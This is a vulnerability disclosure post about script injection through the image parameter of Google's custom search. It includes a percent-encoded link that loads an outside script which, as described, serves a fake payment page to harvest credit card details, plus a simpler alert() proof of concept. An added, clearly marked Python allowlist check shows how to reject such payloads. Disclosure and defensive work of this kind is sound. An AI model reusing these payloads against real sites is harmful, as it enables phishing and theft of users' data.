Google Script Insertion Exploit
Website: www.google.com
Description: Google's custom web search does not prevent javascript from
being inserted into the URL of the image, allowing malicious users to modify
the content of the Google page. This enables phishing attacks, silent theft
of search terms/results/clicks, or modification of actual searches so that
they always contain attacker-controlled results. Given Google's trusted
status, the risk is almost certainly high.
The exploit is easiest to produce through a custom Google search form, which
are commonly seen, used and understood on the web, but it can also be done
through a simple link; this one works in IE:
http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
(This is an example of using the exploit for phishing: it changes the Google
search page to a page informing the user that Google is now a chargeable
service and that they should enter their credit card details to continue.
These are then logged on my site and the user is returned to a working
Google. Currently there is a confirm box warning the user before the form is
submitted.)
This example only works in IE, but other UAs also execute the javascript; it
is a Google vulnerability, not an IE one.
The exploit can be demonstrated more simply with the URL:
http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')
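As an added example (not from the original post and not Google's own code): a server-side allowlist check for a reflected image URL such as the cof=L: value, which rejects both the percent-encoded and the plain form of the payload above. The bounded decode loop, the control-character stripping and the naive single-strip filter it is contrasted with are assumptions about how such a check could be written, not a description of how Google handled the parameter.

```python
import re
from urllib.parse import unquote

# Constructed inputs modelled on the post: the percent-encoded cof=L: value
# (decodes to "javascript:javascript:alert(1)"), the plain variant, and a
# legitimate logo URL for comparison.
ENCODED_PAYLOAD = ("%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a"
                   "%61%6c%65%72%74%28%31%29")
SIMPLE_PAYLOAD = "javascript:javascript:alert('EEK!')"
LEGIT_LOGO = "http://example.com/logo.gif"


def naive_filter(url: str) -> str:
    """Blocklist-style filter (hypothetical) that strips one leading
    'javascript:'.  A doubled prefix, as in the post, survives one pass."""
    if url.lower().startswith("javascript:"):
        return url[len("javascript:"):]
    return url


def is_safe_image_url(raw: str) -> bool:
    """Allowlist check for a URL that will be reflected into an HTML attribute.

    Percent-decodes repeatedly (bounded, to catch double encoding), drops the
    ASCII control/whitespace characters browsers ignore inside a scheme, then
    requires an absolute http(s) URL.  Anything else, including any
    javascript: form, is rejected.  HTML attribute escaping of the accepted
    value is a separate step and still required."""
    url = raw
    for _ in range(3):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    url = re.sub(r"[\x00-\x20\x7f]", "", url)
    return re.fullmatch(r"https?://[^\s\"'<>]+", url, flags=re.IGNORECASE) is not None


if __name__ == "__main__":
    for candidate in (LEGIT_LOGO, SIMPLE_PAYLOAD, ENCODED_PAYLOAD):
        print(f"{candidate[:40]!r:45} safe={is_safe_image_url(candidate)}")
    print("naive filter leaves:", naive_filter(SIMPLE_PAYLOAD))
```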
The exploit has been public for over 2 years, and Google has been informed
on multiple occasions.
More information, and another example exploit, at
http://jibbering.com/2004/10/google.html
Jim Ley.
http://jibbering.com/